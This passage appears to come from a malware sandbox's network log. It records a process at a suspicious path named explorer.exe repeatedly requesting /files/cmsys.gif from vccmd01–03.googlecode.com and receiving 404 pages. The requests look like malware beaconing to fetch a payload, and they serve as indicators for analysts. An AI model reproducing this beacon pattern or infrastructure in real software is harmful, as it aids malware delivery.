                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:09.656996012 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    30192.168.2.560666108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:10.217266083 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:11.142895937 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:11 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:11.142918110 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    31192.168.2.560667142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:11.678127050 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:12.597467899 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:12 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:12.597528934 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    32192.168.2.56066964.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:15.315121889 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:16.236457109 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:16 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:16.236475945 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    33192.168.2.560670108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:16.682811975 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:17.611267090 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:17 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:17.611304998 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    34192.168.2.560671142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:18.033365965 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:18.956201077 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:18 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:18.956221104 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    35192.168.2.56067364.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:21.317416906 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:22.244807005 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:22 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
